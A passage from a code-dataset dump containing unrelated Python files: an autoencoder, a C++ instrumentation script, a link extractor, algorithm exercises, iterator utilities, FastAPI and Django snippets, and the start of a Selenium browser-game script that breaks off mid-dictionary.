get_config_layer(self):\n config_layer = {\n \"input_dim\": self.input_dim,\n \"embedding_dim\": self.embedding_dim,\n \"hidden_dims\": self.hidden_dims,\n \"l1\": self.l1,\n \"l2\": self.l2\n }\n return config_layer\n\n def get_hidden_dims(self):\n hidden_dims = []\n for i, (l1, l2) in enumerate(self.get_layers_size()):\n if i == 0:\n continue\n hidden_dims.append(l1)\n return hidden_dims\n\n\nif __name__ == \"__main__\":\n # print(\"\\n#######\\nEncoder\")\n # # Suppose: 4 -> 3-> 5 -> 2\n # encoder = PartCoder(output_dim=2, hidden_dims=[3, 5])\n # x = tf.ones((3, 4))\n # y = encoder(x)\n # # print(\"y=\", y)\n # # encoder.info(show_weight=True, show_config=False)\n # encoder.deeper()\n # y = encoder(x)\n # # print(\"y=\", y)\n # print(\"After deeper\")\n # encoder.info(show_weight=True, show_config=False)\n #\n # # ----------- Decoder -----------\n # print(\"\\n####\\nDecoder\")\n # # Suppose: 2 -> 5 -> 3 -> 4\n #\n # decoder = PartCoder(output_dim=4, hidden_dims=[5, 3])\n # x = tf.ones((3, 2))\n # y = decoder(x)\n # # print(\"y=\", y)\n # # encoder.info(show_weight=True, show_config=False)\n # decoder.deeper()\n # y = decoder(x)\n # # print(\"y=\", y)\n # print(\"After deeper\")\n # decoder.info(show_weight=True, show_config=False)\n\n # print(\"\\n#######\\nWider encoder\")\n # # Suppose: 2 -> 3 -> 2\n # encoder = PartCoder(output_dim=2, hidden_dims=[3, 4, 1])\n # x = tf.ones((3, 2))\n #\n # print(\"[Original] y=\", encoder(x))\n # encoder.info(show_weight=True, show_config=False)\n # print(\"[Original_1] y=\", encoder(x))\n #\n # encoder.set_dump_weight()\n # 
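Illustrative sanity check (not from the repo; assumes utils.net2net does\n    # Net2Net-style widening, which should be function-preserving up to float error):\n    #   before = encoder(x)\n    #   encoder.wider(added_size=4)\n    #   assert np.allclose(before.numpy(), encoder(x).numpy(), atol=1e-5)\n    # 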
print(\"[Dump] y=\", encoder(x))\n # encoder.info(show_weight=True, show_config=False)\n #\n # encoder.wider(added_size=4)\n # print(\"After wider\")\n # print(\"[Wider] y=\", encoder(x))\n # encoder.info(show_weight=True, show_config=False)\n #\n # encoder.deeper()\n # print(\"\\n###### Deeper \")\n # print(\"[Deeper] y=\", encoder(x))\n # encoder.info(show_weight=True, show_config=False)\n #\n # encoder.wider()\n # print(\"\\n##### Wider\")\n # print(\"[Wider] y=\", encoder(x))\n # encoder.info(show_weight=True, show_config=False)\n\n # ------ Test autoencoder ---------\n # ae = Autoencoder(input_dim=4, embedding_dim=2, hidden_dims=[3])\n # X = np.random.rand(1, 4).astype(np.float32)\n # X_hat, Y = ae(X)\n # X_ = np.random.rand(5, 4).astype(np.float32)\n # print(ae.get_embedding(inputs=X_))\n\n # ---------------- Expand first layer AE -----------\n ae = Autoencoder(input_dim=4, embedding_dim=2, hidden_dims=[3])\n X = np.random.rand(1, 4).astype(np.float32)\n X_hat, Y = ae(X)\n\n # print(\"Before expand:\")\n # ae.info(show_weight=True)\n\n ae.expand_first_layer(layer_dim=6)\n X_2 = np.random.rand(1, 6).astype(np.float32)\n X_hat, Y = ae(X_2)\n # print(\"After expand:\")\n # ae.info(show_weight=True)\n print(ae.get_layers_size())\n\n # ------------------ Test wider deeper ------------\n # ae.info()\n # print(\"##### ----> Modify\")\n # ae.wider(added_size=2)\n # ae.deeper()\n # ae.info()\n","repo_name":"hxtruong6/graph-embedding","sub_path":"src/utils/autoencoder.py","file_name":"autoencoder.py","file_ext":"py","file_size_in_byte":14229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34129793536","text":"#!/usr/bin/env python\n# (Python >= 2.6 including >= 3)\n\n# Using regexps for parsing C++ is, of course, entirely a hack.\n# Configuration that you might want to change is in this file,\n# below the help message and above the trickier code.\n\nimport re, os, sys, subprocess, glob\n\nif len(sys.argv) < 2 or sys.argv[1] in set(['-h','-?','-help','--help']) \\\n\t\tor sys.argv[1] not in set(['instrument', 'restore']):\n\tprint(\"\"\"\nUsage: %s [instrument|restore]\n 'instrument' adds/updates instrumentation; 'restore' deletes it.\n\nInstrumentation is just additions to Lasercake code that send\ndebug message info to stdout upon entering most Lasercake functions.\n\nIt can be useful combined with -Q or such to help debug whether two\ndifferent compilations or runs of Lasercake that *should* be doing\nthe exact same thing in fact *are* doing the exact same thing.\n\nIf there's a problem with buggy optimizers, this might be unhelpful,\nbecause the instrumentation will quite likely change what the compiler's\noptimizer does.\n\"\"\" % sys.argv[0])\n\tsys.exit(0)\n\ndo_restore = True\ndo_instrument = (sys.argv[1] == 'instrument')\n\n# Configuration that you might want to change:\n\n# Instrument functions in these files:\n# (Note: files not currently instrumented might not easily work\n# to instrument, because of regexp hacks doing the wrong thing\n# or argument types that can't easily be serialized. 
To fix the\n# latter, add functions for your types similar to\n# std::ostream& operator<<(std::ostream&, type)\n# , or put the troublesome argument's type name [in the form it's\n# used textually] in excluded_re below, or add an overload in\n# debug_print_deterministically.hpp.)\nfilenames = glob.glob('*.cpp')\n\n# Any function argument type strings (as written) that contain\n# anything matching this regexp are omitted (not attempted to\n# be written to output). This can be useful for large or\n# impossible-to-output data (though various tricky things *can*\n# be done for certain data; see debug_print_deterministically.hpp).\nexcluded_re = re.compile(r\"\"\"\n \\b(?:\n world|frame_output_t|gl_all_data|gl_collection|gl_call_data\n |state_t|tile_physics_state_t|volume_calipers|active_fluids_t\n |water_groups_by_location_t|persistent_water_group_info\n |groupable_water_volume_calipers_t|persistent_water_groups_t\n |objects_map|object_shapes_t\n )\\b\n |\\bQ[A-Z]|\\bLasercake[A-Z]\n |function|_map\\b|_set\\b|\\bset\\b|\\bmap\\b\n |collision_detector|priority_queue|borrowed_bitset\n \"\"\", re.VERBOSE)\n\n# Avoid these specific functions for speed reasons.\n# (Alternately, we could put e.g. /*noinstrument*/ immediately before\n# the function's begin curly brace and that would also prevent this code\n# from instrumenting that function.)\nfunction_names_to_skip_re = re.compile(r\"\"\"\n \\b(\n in_old_box|compute_tile_color|collidable_tile|prepare_tile\n |cast_vector3_to_float|cast_vector3_to_double|look_here\n |tile_manhattan_distance_to_tile_bounding_box\n |do_tile\n )\\b\n \"\"\", re.VERBOSE)\n\n# The code below is closer to black magic, though it's somewhat commented.\n# If you can tweak the regexps or output, for your gain, without breaking\n# anything that currently works (instrument and recover on all the files\n# in the default value of 'filenames', and as much deterministicness of\n# Lasercake output as we can get), then go ahead!\n\nfind_functions_re = re.compile(\n\tr\"\"\"\\b(\\w+) #function name\n\t \\( #begin parenthesis\n\t ([^()]*) #arguments\n\t \\) #end parenthesis\n\t \\s*(?:const\\s*)? #filler matter\n\t (?::[^;]*?[)\\s])? # constructor filler matter, ending with ) or\n\t # space right before the function begin curly\n\t # brace.\n\t # Semicolons are excluded as a hack to keep the\n\t\t\t # ?: operator from occasionally looking like a\n\t\t\t # constructor definition e.g. non-function\n\t\t\t # result_type(*i) in:\n\t\t\t # i ? result_type(*i) : result_type();\n\t { #begin function body\n\t \"\"\",\n\tre.VERBOSE | re.DOTALL)\n\nfilecontents_initial = {}\nfor filename in filenames:\n\twith open(filename, 'r') as f:\n\t\tfilecontents_initial[filename] = f.read()\n\nargname_re = re.compile(r\"\"\"\n\t\t(.*?[^[<(]) #type\n\t\t(\\b\\w+) #arg name\n\t\t(\\s*=[^,]+)? 
#default argument value\n\t\t, #comma between arguments (or for hack at end)\n\t\t\"\"\",\n\t\tre.VERBOSE | re.DOTALL)\ndef get_arg_names(argstr):\n\t#return re.findall(argname_re, argstr+',')\n\tresult = []\n\tfor m in re.finditer(argname_re, argstr+','):\n\t\t#print(m.group(1), m.group(2), re.search(excluded_re, m.group(1)))\n\t\tif not re.search(excluded_re, m.group(1)):\n\t\t\tresult.append(m.group(2))\n\treturn result\n\n# Give up on parameter packs / vararg functions\n# rather than try hard to implement sensible things for uncommon functions.\nfunctions_to_give_up_on_re = re.compile(r\"\\.\\.\\.\")\n\n# These deal strangely with newlines/tabs/etc currently:\nescape_string_for_C_re = re.compile(r\"\"\"([\"\\\\])\"\"\")\ncollapse_whitespace_re = re.compile(r\"\"\"\\s+\"\"\")\ndef escape_string_for_C(string):\n\treturn re.sub(escape_string_for_C_re, r'\\\\\\1',\n\t\t\tre.sub(collapse_whitespace_re, r' ', string))\ndef make_string_for_C(string):\n\treturn '\"' + escape_string_for_C(string) + '\"'\nde_curly_re = re.compile(r'''\\s+{$''')\n\n# These are placed directly into a regex; luckily they\n# don't contain any regex special characters:\nbegin_debug_instrument_str = \" {DEBUG_INSTRUMENT_BEGIN;\"\nend_debug_instrument_str = \"DEBUG_INSTRUMENT_END;}\"\n# The regex that includes those lucky strings above:\nremove_instruments_re = re.compile(\n\tbegin_debug_instrument_str+'.*?'+end_debug_instrument_str)\n\n# TODO find a way to print 'this', only for member functions?\ndef augment_functions(filename, m):\n\tif m.group(1) in set(['if', 'while', 'switch', 'for', 'do', 'catch',\n\t 'BOOST_SCOPE_EXIT']):\n\t\treturn m.group(0)\n\tif re.search(functions_to_give_up_on_re, m.group(0)):\n\t\treturn m.group(0)\n\tif re.search(function_names_to_skip_re, m.group(1)):\n\t\treturn m.group(0)\n\t# This file is mostly time-critical functions:\n\tif filename == 'the_decomposition_of_the_world_into_blocks.cpp' \\\n\t\t\tand m.group(1) != 'ensure_realization_impl':\n\t\treturn m.group(0)\n\tfnname = m.group(1)\n\targnames = get_arg_names(m.group(2))\n\tresult = m.group(0)\n\tresult += begin_debug_instrument_str\n\tresult += (\"\"\" debug_print_ostream() << \"%s(\"; \"\"\" % (escape_string_for_C(fnname)))\n\t#result += \"\"\" {debug_print_ostream() << __func__ << '('; \"\"\"\n\t#result += \"\"\" {debug_print_ostream() << __FILE__ << ':' << __LINE__ << ':' << __PRETTY_FUNCTION__ << '('; \"\"\"\n\t#result += \"\"\" {debug_print_ostream() << __PRETTY_FUNCTION__ << \" (\"; \"\"\"\n\tfirst = True\n\tfor argname in argnames:\n\t\tif first:\n\t\t\tfirst = False\n\t\telse:\n\t\t\tresult += \"\"\"debug_print_ostream() << \", \"; \"\"\"\n\t\tresult += \"\"\"debug_print_val_deterministically(\"\"\"+argname+\"); \"\n\tfnfullish = re.sub(de_curly_re, '', m.group(0))\n\t#result += r\"\"\"debug_print_ostream() << \")\\n\";}\"\"\"\n\t#result += r\"\"\"debug_print_ostream() << \"): \" << __PRETTY_FUNCTION__ << '\\n';}\"\"\"\n\t# There was a difference between 'long int' and 'long long int' meaning int64_t\n\t# on two different platforms, so avoid __PRETTY_FUNCTION__.\n\t# Hopefully __LINE__ is consistent; it'd be better to compute it here.\n\t# Stringize it at preprocessor-time, anyway, to make it faster at runtime if possible.\n\tresult += r\"\"\"debug_print_ostream() << \"): %s:\" BOOST_PP_STRINGIZE(__LINE__) \": %s\\n\";\"\"\" % \\\n\t\t\t(escape_string_for_C(filename),\n\t\t\tescape_string_for_C(fnfullish))\n\tresult += end_debug_instrument_str\n\treturn result\n\nfilecontents_clean = {}\nfilecontents_instrumented = 
{}\nfilecontents_final = {}\nfor filename in filenames:\n\tcont = filecontents_initial[filename]\n\tif do_restore:\n\t\tcont = filecontents_clean[filename] = re.sub(remove_instruments_re, '', cont)\n\tif do_instrument:\n\t\tcont = filecontents_instrumented[filename] = re.sub(\n\t\t\tfind_functions_re,\n\t\t\tlambda m: augment_functions(filename, m),\n\t\t\tcont)\n\tfilecontents_final[filename] = cont\n\nfor filename in filenames:\n\tif filecontents_final[filename] != filecontents_initial[filename]:\n\t\twith open(filename, 'w') as f:\n\t\t\tf.write(filecontents_final[filename])\n\nch = 'config.hpp'\nwith open(ch, 'r') as f:\n\tconfig_contents_initial = f.read()\n\ncont = config_contents_initial\nif do_restore:\n\tcont = re.sub('#if 1\\|\\|DEBUG_PRINT_DETERMINISTICALLY', '#if DEBUG_PRINT_DETERMINISTICALLY', cont)\nif do_instrument:\n\tcont = re.sub('#if DEBUG_PRINT_DETERMINISTICALLY', '#if 1||DEBUG_PRINT_DETERMINISTICALLY', cont)\nconfig_contents_final = cont\n\nif config_contents_final != config_contents_initial:\n\twith open(ch, 'w') as f:\n\t\tf.write(config_contents_final)\n\n","repo_name":"Lasercake/Lasercake","sub_path":"instrument_code_for_determinacy_checking.py","file_name":"instrument_code_for_determinacy_checking.py","file_ext":"py","file_size_in_byte":8574,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"15498848227","text":"#link-extractor.py\nimport csv\nimport time\nimport requests\nfrom bs4 import BeautifulSoup\n\ndef extract_all_links(url):\n html = requests.get(url)\n content = html.text\n soup = BeautifulSoup(content,'html.parser').find_all('a')\n links = [link.get('href') for link in soup]\n return links\n\ndef pretty_print_links(link_lst):\n for link in link_lst:\n print(link)\n\ndef write_to_csv(web_links):\n user_input = input('Please enter a save name for the file (basename excluding extension) > ')\n with open(user_input+'.csv','w') as csv_file:\n csv_writer = csv.writer(csv_file)\n for link in web_links:\n csv_writer.writerow([link])\n\nuser_provided_url = input('Please paste in your url here: \\n')\nprint('Thank you. 
Creating list now...')\ntime.sleep(5)\nweb_links = extract_all_links(user_provided_url)\npretty_print_links(web_links)\nwrite_to_csv(web_links)\n","repo_name":"jfish2/Link-Extractor","sub_path":"link-extractor.py","file_name":"link-extractor.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1640748322","text":"class Solution:\n def isRobotBounded(self, instructions: str) -> bool:\n pos_x, pos_y = 0, 0\n dir_x, dir_y = 0, 1\n\n for instruction in instructions:\n\n if instruction == 'L':\n dir_x, dir_y = -dir_y, dir_x\n\n elif instruction == 'R':\n dir_x, dir_y = dir_y, -dir_x\n\n else:\n pos_x += dir_x\n pos_y += dir_y\n\n return (pos_x, pos_y) == (0, 0) or (dir_x, dir_y) != (0, 1)","repo_name":"amogchandrashekar/Leetcode","sub_path":"Medium/Robot Bounded In Circle.py","file_name":"Robot Bounded In Circle.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"37330379816","text":"import math\n\n\ndef MaxAd(ads, slots):\n revenue = 0\n ads = merge_sort(ads)\n slots = merge_sort(slots)\n for i in range(len(slots)):\n revenue = revenue + slots[i]*ads[i]\n return revenue\n\n\ndef merge_sort(lst):\n if(len(lst) == 1):\n return lst\n else:\n mid = math.floor(((len(lst) - 1) - 0)/2)\n left = merge_sort(lst[0: mid + 1])\n right = merge_sort(lst[mid + 1: len(lst)])\n return merge(left, right)\n\n\ndef merge(left, right):\n lst = [0 for i in range(len(left) + len(right))]\n e = 0\n r = 0\n for i in range(len(left) + len(right)):\n if(e >= len(left)):\n lst[i] = right[r]\n r = r + 1\n elif(r >= len(right)):\n lst[i] = left[e]\n e = e + 1\n elif(left[e] >= right[r]):\n lst[i] = left[e]\n e = e + 1\n else:\n lst[i] = right[r]\n r = r + 1\n return lst\n\n\ndef input_multiple(n, e, h):\n lst = [0 for i in range(n)]\n for i in range(n):\n flag = False\n while flag is False:\n try:\n x = int(input())\n if(x >= e and x <= h):\n lst[i] = x\n flag = True\n else:\n raise ValueError\n except ValueError:\n print(f\"please enter the value between {e} and {h}\")\n return lst\n\n\ndef input_single(e, h):\n flag = False\n while flag is False:\n try:\n x = int(input())\n if(x >= e and x <= h):\n flag = True\n else:\n raise ValueError\n except ValueError:\n print(f\"please enter it between {e} and {h}\")\n return x\n\n\nif(__name__ == \"__main__\"):\n print(merge_sort([3, 1, 4, 2, 5]))\n n = input_single(1, 10**3)\n ads = input_multiple(n, -10**5, 10**5)\n slots = input_multiple(n, -10**5, 10**5)\n print(MaxAd(ads, slots))\n\n\n","repo_name":"akhileshwar1/algo-data-structs","sub_path":"algo/greedy/max_ad.py","file_name":"max_ad.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22022520423","text":"import random\nfrom collections.abc import Iterator\nfrom typing import Any, List, Optional\n\n\nclass PeekingIterator(Iterator):\n \"\"\"An iterator that lets you :meth:`peek` at the next item on deck.\n Returns None when there is no next item (i.e. 
when\n :meth:`__next__` will produce a `StopIteration` exception).\n\n >>> p = PeekingIterator(iter(range(3)))\n >>> p.__next__()\n 0\n >>> p.peek()\n 1\n >>> p.peek()\n 1\n >>> p.__next__()\n 1\n >>> p.__next__()\n 2\n >>> p.peek() == None\n True\n >>> p.__next__()\n Traceback (most recent call last):\n ...\n StopIteration\n \"\"\"\n\n def __init__(self, source_iter: Iterator):\n \"\"\"\n Args:\n source_iter: the iterator we want to peek at\n \"\"\"\n self.source_iter = source_iter\n self.on_deck: List[Any] = []\n\n def __iter__(self) -> Iterator:\n return self\n\n def __next__(self) -> Any:\n if self.on_deck:\n return self.on_deck.pop()\n else:\n item = self.source_iter.__next__()\n return item\n\n def peek(self) -> Optional[Any]:\n \"\"\"Peek at the upcoming value on the top of our contained\n :py:class:`Iterator` non-destructively (i.e. calling :meth:`__next__` will\n still produce the peeked value).\n\n Returns:\n The value that will be produced by the contained iterator next\n or None if the contained Iterator is exhausted and will raise\n `StopIteration` when read.\n\n \"\"\"\n if self.on_deck:\n return self.on_deck[0]\n try:\n item = next(self.source_iter)\n self.on_deck.append(item)\n return self.peek()\n except StopIteration:\n return None\n\n\nclass PushbackIterator(Iterator):\n \"\"\"An iterator that allows you to push items back onto the front\n of the sequence so that they are produced before the items at the\n front/top of the contained py:class:`Iterator`. e.g.\n\n >>> i = PushbackIterator(iter(range(3)))\n >>> i.__next__()\n 0\n >>> i.push_back(99)\n >>> i.push_back(98)\n >>> i.__next__()\n 98\n >>> i.__next__()\n 99\n >>> i.__next__()\n 1\n >>> i.__next__()\n 2\n >>> i.push_back(100)\n >>> i.__next__()\n 100\n >>> i.__next__()\n Traceback (most recent call last):\n ...\n StopIteration\n\n \"\"\"\n\n def __init__(self, source_iter: Iterator):\n self.source_iter = source_iter\n self.pushed_back: List[Any] = []\n\n def __iter__(self) -> Iterator:\n return self\n\n def __next__(self) -> Any:\n if self.pushed_back:\n return self.pushed_back.pop()\n return self.source_iter.__next__()\n\n def push_back(self, item: Any) -> None:\n \"\"\"Push an item onto the top of the contained iterator such that\n the next time :meth:`__next__` is invoked we produce that item.\n\n Args:\n item: the item to produce from :meth:`__next__` next.\n \"\"\"\n self.pushed_back.append(item)\n\n\nclass SamplingIterator(Iterator):\n \"\"\"An :py:class:`Iterator` that simply echoes what its\n `source_iter` produces but also collects a random sample (of size\n `sample_size`) from the stream that can be queried at any time.\n\n .. note::\n Until `sample_size` elements have been produced by the\n `source_iter`, the sample return will be less than `sample_size`\n elements in length.\n\n .. 
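note::\n        The replacement step in :meth:`__next__` draws ``random.randint(0, n)``\n        (``n`` = items seen so far), which has ``n + 1`` outcomes, so a new item\n        enters the sample with probability ``sample_size / (n + 1)`` rather than\n        the textbook ``sample_size / n``; ``random.randrange(n)`` would make the\n        reservoir sampling exact.\n\n    .. 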
note::\n If `sample_size` is >= `len(source_iter)` then this will produce\n a copy of `source_iter`.\n\n >>> import collections\n >>> import random\n\n >>> random.seed(22)\n >>> s = SamplingIterator(iter(range(100)), 10)\n >>> s.__next__()\n 0\n\n >>> s.__next__()\n 1\n\n >>> s.get_sample()\n [0, 1]\n\n >>> collections.deque(s)\n deque([2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99])\n\n >>> s.get_sample()\n [78, 18, 47, 83, 93, 26, 25, 73, 94, 38]\n\n \"\"\"\n\n def __init__(self, source_iter: Iterator, sample_size: int):\n self.source_iter = source_iter\n self.sample_size = sample_size\n self.resovoir: List[Any] = []\n self.stream_length_so_far = 0\n\n def __iter__(self) -> Iterator:\n return self\n\n def __next__(self) -> Any:\n item = self.source_iter.__next__()\n self.stream_length_so_far += 1\n\n # Filling the resovoir\n pop = len(self.resovoir)\n if pop < self.sample_size:\n self.resovoir.append(item)\n if self.sample_size == (pop + 1): # just finished filling...\n random.shuffle(self.resovoir)\n\n # Swap this item for one in the resovoir with probabilty\n # sample_size / stream_length_so_far. See:\n #\n # https://en.wikipedia.org/wiki/Reservoir_sampling\n else:\n r = random.randint(0, self.stream_length_so_far)\n if r < self.sample_size:\n self.resovoir[r] = item\n return item\n\n def get_sample(self) -> List[Any]:\n \"\"\"\n Returns:\n The current sample set populated randomly from the items\n returned by the contained :class:`Iterator` so far.\n\n .. note::\n Until `sample_size` elements have been produced by the\n `source_iter`, the sample return will be less than `sample_size`\n elements in length.\n\n .. 
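note::\n            The list returned is the iterator's internal reservoir, not a copy;\n            mutating it in place will corrupt future sampling. Take a\n            ``list(...)`` copy if you need to modify the result.\n\n        .. 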
note::\n If `sample_size` is >= `len(source_iter)` then this will produce\n a copy of `source_iter`.\n \"\"\"\n return self.resovoir\n\n\nif __name__ == \"__main__\":\n import doctest\n\n doctest.testmod()\n","repo_name":"scottgasch/pyutils","sub_path":"src/pyutils/iter_utils.py","file_name":"iter_utils.py","file_ext":"py","file_size_in_byte":5929,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"27597704267","text":"from random import choice\r\nimport turtle\r\nimport math\r\nfrom statistics import mean\r\n\r\ndef main():\r\n length, walks = 1000, 50\r\n steps = [(0,1),(1,0),(0,-1),(-1,0)]\r\n bo = turtle.Turtle()\r\n end_points = []\r\n \r\n #for each walk of 1000 steps, find the endpoint, add to list\r\n for i in range(walks):\r\n point = [0,0]\r\n for j in range(length):\r\n #point = list(map(sum,zip(point,choice(steps))))\r\n step = choice(steps)\r\n point[0] += step[0]\r\n point[1] += step[1]\r\n end_points.append(point)\r\n\r\n \r\n #draw the endpoints to the canvas\r\n bo.pu()\r\n for point in end_points:\r\n bo.goto(point[0],point[1])\r\n bo.stamp()\r\n bo.screen.mainloop()\r\n \r\n #compute each endpoint's distance from the origin\r\n distance = []\r\n for point in end_points:\r\n dist = math.sqrt(point[0]**2 + point[1]**2)\r\n distance.append(dist)\r\n # report the average endpoint distance\r\n print(f'\\nAverage endpoint distance from origin: {mean(distance)}')\r\n \r\n \r\n \r\nif __name__ == '__main__':\r\n main()","repo_name":"Bow14/PythonThonnyCode","sub_path":"Randstamp.py","file_name":"Randstamp.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37567411731","text":"from typing import Callable\nfrom loguru import logger\nfrom fastapi import Request, Response\n\n\nclass LoggerMiddleWare:\n \"\"\"\n Middleware that logs incoming requests and outgoing responses\n \"\"\"\n\n @staticmethod\n async def set_body(request: Request, body: bytes) -> None:\n async def receive():\n return {'type': 'http.request', 'body': body}\n\n request._receive = receive\n\n async def get_body(self, request: Request) -> bytes:\n body = await request.body()\n await self.set_body(request, body)\n return body\n\n async def __call__(\n self, request: Request, call_next,\n *args, **kwargs\n ):\n raw_request_body = await request.body()\n # The steps below are needed so that we don't\n # clobber the request body and don't leave the\n # event loop hanging when the response body\n # is read later\n await self.set_body(request, raw_request_body)\n raw_request_body = await self.get_body(request)\n request_body = raw_request_body.decode()\n logger.debug(\n f'accept request method: {request.method} from client: {request.client.host}.'\n f' url: {request.url}, params : {request.query_params}'\n f' body: {request_body}')\n\n response = await call_next(request)\n\n body = b\"\"\n async for chunk in response.body_iterator:\n body += chunk\n logger.debug(\n f'Response to client {request.client.host} body: {body.decode()}')\n return Response(\n content=body,\n status_code=response.status_code,\n headers=dict(response.headers),\n media_type=response.media_type\n )\n","repo_name":"artas/nanosemantic","sub_path":"app/midleware/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15060986163","text":"from django.urls import include, path\nfrom rest_framework.routers import DefaultRouter\n\nfrom 
.views import (IngredientViewSet, RecipeViewSet, TagViewSet,\n UserSubscribeView, UserSubscriptionsViewSet)\n\n\nrouter_v1 = DefaultRouter()\n\nrouter_v1.register(r'tags', TagViewSet, basename='tags')\nrouter_v1.register(r'ingredients', IngredientViewSet, basename='ingredients')\nrouter_v1.register(r'recipes', RecipeViewSet, basename='recipes')\n\nurlpatterns = [path('users/subscriptions/',\n UserSubscriptionsViewSet.as_view({'get': 'list'}\n ), name='subscriptions'),\n path('users/<int:user_id>/subscribe/',\n UserSubscribeView.as_view(), name='subscribe'),\n path('', include(router_v1.urls)),\n path('', include('djoser.urls')),\n path('auth/', include('djoser.urls.authtoken')),\n ]\n","repo_name":"dlozko/foodgram-project-react","sub_path":"backend/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42206900586","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('frontend', '0003_tag_num'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='category',\n options={'ordering': ['site', 'inner_pos', 'pos', 'title_ru'], 'verbose_name': 'category', 'verbose_name_plural': 'categories'},\n ),\n migrations.RemoveField(\n model_name='category',\n name='title',\n ),\n migrations.AddField(\n model_name='category',\n name='title_en',\n field=models.CharField(default=b'', max_length=255, null=True, verbose_name='title en', blank=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='category',\n name='title_ru',\n field=models.CharField(default=b'', max_length=255, verbose_name='title ru'),\n preserve_default=True,\n ),\n ]\n","repo_name":"vaad2/vestblog","sub_path":"frontend/migrations/0004_auto_20150309_1924.py","file_name":"0004_auto_20150309_1924.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"2401439974","text":"import heapq\n\nclass Solution:\n def minRefuelStops(self, target: int, startFuel: int, stations: List[List[int]]) -> int:\n\n # Greedy Solution: TC: O(nlogn), Space: O(n)\n # Approach: Traverse each station in a loop\n # At each station, store prev station to calculate how far travelled\n # Also add all previous stations to a max heap\n # If we run out of fuel at a station, use the heap to \n # Extract the station with most fuel\n # Continue until all stations have been traversed\n\n heap = []\n fuelRem = startFuel\n prev = 0\n result = 0\n\n for pos,fuel in stations + [[target,0]]:\n fuelRem -= pos-prev\n while fuelRem < 0 and len(heap):\n fuelRem += -heapq.heappop(heap)\n result += 1\n \n if fuelRem < 0:\n return -1\n \n heapq.heappush(heap, -fuel)\n prev = pos\n\n return result\n","repo_name":"SouradeepSaha/leetcode","sub_path":"871. 
Minimum Number of Refueling Stops.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29944734641","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import Select\nimport selenium.webdriver.support.ui as UI\nfrom selenium.common.exceptions import TimeoutException\nfrom contextlib import contextmanager\nfrom timeit import default_timer\nfrom bs4 import BeautifulSoup as BS\nimport time\nimport random\nimport sys\nimport string\nfrom termcolor import colored\n\n@contextmanager\ndef elapsed_timer():\n start = default_timer()\n elapser = lambda: default_timer() - start\n yield lambda: elapser()\n end = default_timer()\n elapser = lambda: end-start\n\n# Login information\nlogin_name = \"\"\npassword_text = \"\"\n\n# prep\ncurrent_stamina = 0\npercent_stamina = 0\n\ncurrent_toxic = 0\npercent_toxic = 0\n\nerror_counter = 0\nrave_counter = 0\n\noriginal_stdout = sys.stdout\n\npower_dict = {\n \"Robber\": {\n \"Prospect\": 100,\n \"Newbie\": 100,\n \"Snitch\": 100,\n \"Pickpocket\": 100,\n \"Shoplifter\": 10000,\n \"Crook\": 40000,\n \"Burglar\": 75000,\n \"Larcenist\": 150000,\n \"Mugger\": 200000,\n \"Kingpin\": 300000,\n \"Mobster\": 450000,\n \"Padrino\": 600000,\n \"Godfather\": 3000000\n },\n \"Hitman\": {\n \"Prospect\": 100,\n \"Bruiser\": 100,\n \"Bravo\": 100,\n \"Goon\": 100,\n \"Garrotter\": 20000,\n \"Cut-throat\": 60000,\n \"Murderer\": 90000,\n \"Butcher\": 160000,\n \"Desperado\": 250000,\n \"Kingpin\": 450000,\n \"Mobster\": 500000,\n \"Padrino\": 900000,\n \"Godfather\": 3000000\n },\n \"Businessman\": {\n \"Prospect\": 100,\n \"Ware-slave\": 100,\n \"Swindler\": 100,\n \"Employer\": 100,\n \"Entrepreneur\": 10000,\n \"Banker\": 40000,\n \"Manager\": 75000,\n \"Director\": 150000,\n \"Top executive\": 200000,\n \"Kingpin\": 300000,\n \"Mobster\": 450000,\n \"Padrino\": 600000,\n \"Godfather\": 3000000\n },\n \"Pimp\": {\n \"Prospect\": 100,\n \"Popcorn\": 100,\n \"Gigolo\": 100,\n \"Bawd\": 100,\n \"Pet Owner\": 10000,\n \"Player\": 40000,\n \"Procurer\": 75000,\n 